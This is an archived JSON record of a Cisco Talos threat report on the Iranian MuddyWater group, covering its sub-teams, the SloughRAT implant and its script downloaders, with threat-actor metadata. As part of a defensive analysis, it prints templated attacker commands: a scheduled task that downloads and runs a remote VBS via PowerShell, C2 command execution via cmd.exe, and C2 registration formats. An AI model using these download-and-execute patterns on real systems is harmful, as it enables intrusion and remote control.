{
	"id": "f8c5295a-99d4-48e7-b2fd-56ca10312d08",
	"created_at": "2026-04-06T00:13:47.295547Z",
	"updated_at": "2026-04-10T03:34:22.677028Z",
	"deleted_at": null,
	"sha1_hash": "973a3d9c5b01a7d62278b4dcd5ad72efd7c36819",
	"title": "Iranian linked conglomerate MuddyWater comprised of regionally focused subgroups",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5872868,
	"plain_text": "Iranian linked conglomerate MuddyWater comprised of regionally\r\nfocused subgroups\r\nBy Asheer Malhotra\r\nPublished: 2022-03-10 · Archived: 2026-04-05 14:13:37 UTC\r\nCisco Talos has observed new cyber attacks targeting Turkey and other Asian countries we believe with\r\nhigh confidence are from groups operating under the MuddyWater umbrella of APT groups. U.S. Cyber\r\nCommand recently connected MuddyWater to Iran's Ministry of Intelligence and Security (MOIS).\r\nThese campaigns primarily utilize malicious documents (maldocs) to deploy downloaders and RATs\r\nimplemented in a variety of languages, such as PowerShell, Visual Basic and JavaScript.\r\nAnother new campaign targeting the Arabian peninsula deploys a WSF-based RAT we're calling\r\n\"SloughRAT\", identified as an implant called \"canopy\" by CISA in their advisory released in late February.\r\nBased on a review of multiple MuddyWater campaigns, we assess that the Iranian APT is a conglomerate\r\nof multiple teams operating independently rather than a single threat actor group.\r\nThe MuddyWater supergroup is highly motivated and can use unauthorized access to conduct espionage,\r\nintellectual property theft and deploy ransomware and destructive malware in an enterprise.\r\nExecutive summary\r\nCisco Talos has identified multiple campaigns and tools being perpetrated by the MuddyWater APT group, widely\r\nconsidered to be affiliated with Iranian interests. These threat actors are considered extremely motivated and\r\npersistent when it comes to targeting victims across the globe.\r\nTalos disclosed a MuddyWater campaign in January targeting Turkish entities that leveraged maldocs and\r\nexecutable-based infection chains to deliver multistage, PowerShell-based downloader malware. 
This group previously used the same tactics to target other countries in Asia, such as Armenia and Pakistan.\r\nIn our latest findings, we discovered a new campaign targeting Turkey and the Arabian peninsula with maldocs to deliver a Windows script file (WSF)-based remote access trojan (RAT) we're calling \"SloughRAT\", an implant known as \"canopy\" in CISA's most recent alert from February 2022 about MuddyWater.\r\nThis trojan, although obfuscated, is relatively simple and attempts to execute arbitrary code and commands received from its command and control (C2) servers.\r\nOur investigation also led to the discovery of two additional script-based implants: one written in Visual Basic (VB) (late 2021 - 2022) and one in JavaScript (2019 - 2020), both of which also download and run arbitrary commands on the victim's system.\r\nMuddyWater's variety of lures and payloads — along with the targeting of several different geographic regions — strengthens our growing hypothesis that MuddyWater is a conglomerate of sub-groups rather than a single actor.\r\nThese sub-groups have conducted campaigns against a variety of industries such as national and local governments and ministries, universities and private entities such as telecommunication providers. While these teams seem to operate independently, they are all motivated by the same factors that align with Iranian national security objectives, including espionage, intellectual property theft, and destructive or disruptive operations based on the victims they target.\r\nhttps://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html\r\nPage 1 of 20\n\nA variety of campaigns analyzed are marked by the development and use of distinct infection vectors and tools to gain entry, establish long-term access, siphon valuable information and monitor their targets. 
The MuddyWater teams appear to share TTPs, as evidenced by the incremental adoption of various techniques over time in different MuddyWater campaigns. We represent this progression in a detailed graphic in the first main section of this blog.\r\nMuddyWater threat actor\r\nMuddyWater, also known as \"MERCURY\" or \"Static Kitten,\" is an APT group the U.S. Cyber Command recently attributed to Iran's Ministry of Intelligence and Security (MOIS). This threat actor, active since at least 2017, frequently conducts campaigns against high-value targets in countries in North America, Europe and Asia.\r\nMuddyWater campaigns typically fall into one of the following categories:\r\nEspionage: Collecting information on adversaries or regional partners that can benefit Iran by helping to advance its political, economic, or national security interests.\r\nIntellectual property theft: Stealing intellectual property and other proprietary information can benefit Iran in a variety of ways, including helping Iranian businesses against their competitors, influencing economic policy decisions at the state level, or informing government-related research and design efforts, among others. These campaigns target private and government entities, such as universities, think tanks, federal agencies, and various industry verticals.\r\nRansomware attacks: MuddyWater has previously attempted to deploy ransomware, such as Thanos, on victim networks to either destroy evidence of their intrusions or disrupt operations.\r\nMuddyWater frequently relies on the use of DNS to contact their C2 servers, while the initial contact with hosting servers is done via HTTP. 
Their initial payloads usually use PowerShell, Visual Basic and JavaScript scripting along with living-off-the-land binaries (LoLBins) and remote connection utilities to assist in the initial stages of the infection.\r\nMuddyWater likely comprised of multiple sub-groups\r\nWe assess that MuddyWater is a conglomerate of smaller teams, with each team using different targeting tactics against specific regions of the world. They appear to share some techniques and evolve them as needed. This sharing is possibly the result of contractors that move from team to team, or the use of the same development and operational contractors across each team. The latter also explains why we have seen simple indicators such as unique strings and watermarks shared between MuddyWater and the Phosphorus (aka APT35 and Charming Kitten) APT groups. These groups are attributed to different Iranian state organizations — the MOIS and IRGC, respectively.\r\nBased on new information and a review of MuddyWater threat activity and TTPs, we can link together the attacks covered in our January 2022 MuddyWater blog with this most recent campaign targeting Turkey and other Asian countries. The graphic below shows the overlap in TTPs and regional targeting between the various MuddyWater campaigns, which suggests these attacks are distinct, yet related, clusters of activity. While some campaigns initially appeared to leverage new TTPs that seemed unrelated to other operations, we later found that they instead demonstrated a broader TTP-sharing paradigm, typical of coordinated operational teams.\r\nTracing MuddyWater's activity over the last year, we see that some of the shared techniques seem to be refined from one region to the other, suggesting the teams use their preferred flavors of tools of choice, including final payloads. 
The above timeline also shows the incremental usage of certain techniques in different campaigns over time, suggesting that they are tested and improved before being implemented in future operations.\r\nThe first two techniques we see being implemented and then shared in future operations are signaling tokens and an executable dropper. We first observed the usage of tokens for signaling in April 2021 in a campaign against Pakistan via a simple dropper that downloads the \"Connectwise\" remote administration tool. Later, in June, we see the first usage of the executable dropper against Armenia (described in detail in our previous post). The dropped payload is a PowerShell script that loads another PowerShell script that downloads and executes a final PowerShell-based payload.\r\nThe two techniques were then combined later in August 2021 in a campaign targeting Pakistan, this time still using the homemade tokens. Later, the actors graduated to a more professional implementation of the token by using canarytokens[.]com's infrastructure. canarytokens[.]com is a legitimate service that MuddyWater uses to make their operations appear less suspicious. These techniques were next leveraged in a November 2021 campaign targeting Turkey, the campaign we described in our January blog. In these attacks on Turkey, MuddyWater used maldocs with tokens and the same executable droppers previously seen targeting Armenia and Pakistan.\r\nIn March 2021, we observed MuddyWater using the Ligolo reverse-tunneling tool in attacks on Middle Eastern countries. This tactic was later reused in December 2021, along with the introduction of a new implant. Beginning in December 2021, we observed MuddyWater using a new WSF-based RAT we named \"SloughRAT\" to target countries in the Arabian Peninsula, which is described in more detail later in this blog. 
During our investigation, we discovered another version of SloughRAT being deployed against entities in Jordan. This attack included the deployment of Ligolo — a MuddyWater tactic also corroborated by Trend Micro in March 2021 — following the deployment of SloughRAT.\r\nAll these attacks show an interesting pattern: multiple commonalities in some key infection artifacts and TTPs, while retaining enough operational distinctions. This pattern can be broken down into the following practices:\r\nThe introduction of a TTP in one geography, a delay of typically two or three months, then the reuse of that same TTP in a completely different geography, alongside other proven TTPs borrowed from campaigns conducted in another geography.\r\nThe introduction of at least one new TTP completely novel to MuddyWater's tactics in almost every geographically distinct campaign.\r\nThese observations strongly indicate that MuddyWater is a group of groups, each responsible for targeting a specific geography. Each is also responsible for developing novel infection techniques while being allowed to borrow from a pool of TTPs tested in previously separate campaigns.\r\nCampaigns\r\nTying together previous MuddyWater campaigns\r\nIn our previous post, we disclosed two campaigns using the same types of Windows executables — one targeting Turkey in November 2021 and one from June 2021 targeting Armenia. Another campaign illustrated previously used similar executables, this time to target Pakistan. This campaign deployed a PowerShell-based downloader on the endpoint to accept and execute additional PS1 commands from the C2 server.\r\nGoing further back, in April 2021, we observed another instance of MuddyWater targeting entities in Pakistan, this time with a maldoc-based infection vector. 
The lure document claimed to be part of a court case, as the image below shows.\r\nMalicious lure containing a blurred image of the state emblem of Pakistan and referring to a court case.\r\nIn this case, however, the attackers attempted to deploy the Connectwise Remote Access client on the target's endpoints, a tactic commonly used by MuddyWater to gain an initial foothold on targets' endpoints.\r\nIn the attacks deploying the RAT in April 2021 and the EXE-based infection vector from August 2021, the maldocs and decoy documents reached out to a common server to download a common image file that links them. These campaigns used a homemade implementation of signaling tokens. In this case, the maldocs have an external entity downloaded from an attacker-controlled server. This entity consists of a simple image which has no malicious content. The same base URL is employed in both campaigns:\r\nhxxp://172.245.81[.]135:10196/Geq5P3aFpaSrK3PZtErNgUsVCfqQ9kZ9/\r\nHowever, the maldoc appends the additional URL extension \"ef4f0d9af47d737076923cfccfe01ba7/layer.jpg\" while the decoy appends \"/Pan-op/gallery.jpg\". This may be a way for the attackers to track their initial infection vector and determine which one is more successful. It is highly likely that the attackers used this server as a token tracker to keep track of successful infections in this campaign. This token-tracking system was then migrated to CanaryTokens in September 2021 in the attacks targeting Turkey using the malicious Excel documents.\r\nMuddyWater Middle East campaign using maldocs — SloughRAT\r\nDuring a recent IR engagement, Talos observed multiple instances of malicious documents (maldocs) — specifically XLS files — distributed by MuddyWater. 
These XLS files were observed targeting the Arabian peninsula through a recent phishing campaign.\r\nThe maldoc consists of a malicious macro that drops two WSF files on the endpoint. One of these scripts is the instrumentor script meant to execute the next stage. This instrumentor script is placed in the current user's Startup folder by the VBA macro to establish persistence across reboots.\r\nThe second script is a WSF-based RAT we call \"SloughRAT\" that can execute arbitrary commands on the infected endpoint. This RAT consists of obfuscated code from interweaved Visual Basic and JavaScript.\r\nExcel document that drops the Outlook.wsf file.\r\nWSF-based instrumentor script\r\nAt first glance, the instrumentor script looks complicated because of its obfuscation. However, at its core, the script is solely meant to execute the next stage WSF RAT payload.\r\nAt runtime, the code deobfuscates two key components for the next stage:\r\nThe path to the RAT script, which is hard-coded but obfuscated.\r\nThe function name that acts as the de facto key in the RAT and triggers the malicious code.\r\nThis data is then used to make a call to the WSF-based RAT:\r\ncmd.exe /c \u003cpath_to_WSF_RAT\u003e \u003ckey\u003e\r\nDeobfuscation of persistence.\r\nSloughRAT analysis\r\nThe WSF implant has several capabilities. The script uses multilayer obfuscation to hide its true intent. 
The screenshots below are the result of the analysis and are deobfuscations for better comprehension.\r\nThe RAT script needs a function name as an argument to execute correctly and perform its malicious activities. This name is provided by the instrumentor script and could be a method of thwarting automated dynamic analysis, since submitting the RAT script in isolation without the function name as an argument will result in a failed run of the sample in a sandbox.\r\nPreliminary information gathering and infection registration\r\nThe RAT script begins execution by performing a WMI query to record the IP address of the infected endpoint.\r\nDeobfuscation of discovery capabilities.\r\nIt will then get the user and computer names by querying the environment variables:\r\n%COMPUTERNAME%\r\n%USERNAME%\r\nDeobfuscation of discovery capabilities.\r\nThis system information is then concatenated using a delimiter and encoded to register the infected system with the C2 server hardcoded into the implant.\r\nFormat:\r\n\u003cIP_address\u003e|!)!)!|%ComputerName%/%USERNAME%\r\nRAT capabilities\r\nThis RAT's capabilities are relatively simple, aside from the information-gathering capabilities described previously.\r\nOnce the infection is registered with the C2 server, the implant will receive a command code from the C2 server. The implant uses two different URLs:\r\nOne is used to register the implant and request arbitrary commands from the C2.\r\nAnother is used to POST the results of the commands executed on the infected endpoint.\r\nThe communication with the C2 is done using the common ServerXMLHTTP object from the MSXML2 API to construct an HTTP POST request.\r\nThe time between each request is randomized, which makes the malware stealthier and can bypass some sandboxes.\r\nDeobfuscation of HTTP request construction.\r\nAny data sent to the C2 server 
is in the format of HTTP forms accompanied by relevant headers, like:\r\nContent-Type\r\nContent-Length\r\nCharSet\r\nFirst, the script sends the system information to the first C2 URL by encoding the message and sending it via POST request, inside the parameter \"vl\", using the following format:\r\n\u003cIP_address\u003e|!)!)!|%ComputerName%/%USERNAME%\r\nThen, the server returns a UID constructed via concatenation of the server IP and a UUIDv4, for example 5-199-133-149-\u003cUUIDv4\u003e. This UID is stored in a variable and used in keep-alive messages to request commands from the C2.\r\nThen, this UID is sent through the \"vl\" parameter inside a POST HTTP request to another C2 URL. When the server receives this UID, it returns an encoded message that the script interprets.\r\nThe message can be:\r\n\"ok\": Do nothing and send the UID again (like a keep-alive).\r\n\"401\": This order clears the UID variable and forces the script to request another UID by sending a request to the first URI.\r\nA command to execute, which starts the command execution routine.\r\nA command received from the C2 server will be executed using the command line utility. Its output is recorded in a temporary file on disk in a location such as \"%TEMP%\\stari.txt\". This data is then immediately read and sent out to the C2. 
The message will have the following format:\r\n\u003cUID\u003e|!)!)!|\u003cresult of command output\u003e\r\nCommands are executed using the command line:\r\ncmd.exe /c \u003ccommand_sent_by_C2\u003e \u003e\u003e \u003cpath_to_temp_file\u003e\r\nDeobfuscation of command execution routine.\r\nThe attackers used another version of SloughRAT, which isn't as obfuscated as the version illustrated earlier, this time targeting entities in the Arabian peninsula. The overall functionality used in this instance is the same with minor modifications in file paths, delimiters, etc.\r\nVersion No. 2 of the WSF RAT — minor changes only.\r\nThe attackers utilized SloughRAT to deploy Ligolo, an open-source reverse-tunneling tool, to gain a greater degree of control over the infected endpoints. This observed tactic is consistent with previous findings from Trend Micro.\r\nOverall infection chain:\r\nVBS-based downloaders\r\nIn another instance, we observed the deployment of VBS-based malicious downloaders in December 2021 and through January 2022 via malicious scheduled tasks set up by the attackers. The scheduled task would look something like this:\r\nSchTasks /Create /SC ONCE /ST 00:01 /TN \u003ctask_name\u003e /TR powershell -exec bypass -w 1 Invoke-WebRequest -Uri '\u003cremote_URL_location\u003e' -OutFile \u003cmalicious_VBS_path_on_endpoint\u003e; wscript.exe \u003cmalicious_VBS_path_on_endpoint\u003e\r\nThese tasks download and parse content from the C2 server and execute it on the infected endpoint. 
The output of the command would be written to a temporary file in the %APPDATA% directory and subsequently read and exfiltrated to the C2.\r\nThe complete infection chain of these VBS-based downloaders is currently unknown.\r\nVBS-based downloader.\r\nOlder campaign using JS-based downloaders\r\nAn older campaign operated by MuddyWater toward the end of November 2019 and into 2020 utilized maldocs and a convoluted chain of obfuscated scripts to deploy a JavaScript-based downloader/stager on the infected endpoint. This campaign also appears to target Turkish users.\r\nThe maldoc contains a macro that would drop a malicious obfuscated VBS in a directory on the system. The macro would then create persistence for the VBS via the Registry Run key of the current user. This VBS is responsible for deobfuscating the next payloads and executing them on the endpoint. This execution culminated in a malicious JS downloader being executed on the system to download and execute commands.\r\nJS-based downloader.\r\nConclusion\r\nCisco Talos has observed Iranian APT groups conducting malicious operations and activities all over the world for years. In particular, 2021 was prolific in cybersecurity incidents for Iran, where state-run organizations were targeted. These events were attributed to Western nations by the Iranian regime, with the promise of revenge. It's hard to say if these campaigns are the result of such promises or just part of these groups' usual activity. 
However, the fact that they have changed some of their methods of operation and tools is yet another sign of their adaptability and unwillingness to refrain from attacking other nations.\r\nWe believe there are links between these different campaigns, including the migration of techniques from region to region, along with their evolution into more advanced versions. Overall, the campaigns we describe cover Turkey, Pakistan, Armenia and countries from the Arabian peninsula. While they share certain techniques, these campaigns also denote individuality in the way they were conducted, indicating the existence of multiple sub-teams beneath the MuddyWater umbrella — all sharing a pool of tactics and tools to pick and choose from.\r\nDefense-in-depth strategies based on a risk analysis approach can deliver the best results in protecting against such a highly motivated set of threat actors. However, this should always be complemented by a good incident response plan which has not only been tested with tabletop exercises, but also reviewed and improved every time it is put to the test on real engagements.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. 
You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\r\nSnort rules for protection against this threat are: 59226 - 59230.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. 
For specific OSqueries on this threat, click below:\r\nLigolo\r\nSloughRAT\r\nIOCS\r\nSource: https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html"
	],
	"report_names": [
		"iranian-supergroup-muddywater.html"
	],
	"threat_actors": [
		{
			"id": "82b92285-4588-48c9-8578-bb39f903cf62",
			"created_at": "2022-10-25T15:50:23.850506Z",
			"updated_at": "2026-04-10T02:00:05.418577Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"Charming Kitten"
			],
			"source_name": "MITRE:Charming Kitten",
			"tools": [
				"DownPaper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7",
			"created_at": "2025-08-07T02:03:24.764883Z",
			"updated_at": "2026-04-10T02:00:03.611225Z",
			"deleted_at": null,
			"main_name": "COBALT MIRAGE",
			"aliases": [
				"DEV-0270 ",
				"Nemesis Kitten ",
				"PHOSPHORUS ",
				"TunnelVision ",
				"UNC2448 "
			],
			"source_name": "Secureworks:COBALT MIRAGE",
			"tools": [
				"BitLocker",
				"Custom powershell scripts",
				"DiskCryptor",
				"Drokbk",
				"FRPC",
				"Fast Reverse Proxy (FRP)",
				"Impacket wmiexec",
				"Ngrok",
				"Plink",
				"PowerLessCLR",
				"TunnelFish"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434427,
	"ts_updated_at": 1775792062,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/973a3d9c5b01a7d62278b4dcd5ad72efd7c36819.pdf",
		"text": "https://archive.orkl.eu/973a3d9c5b01a7d62278b4dcd5ad72efd7c36819.txt",
		"img": "https://archive.orkl.eu/973a3d9c5b01a7d62278b4dcd5ad72efd7c36819.jpg"
	}
}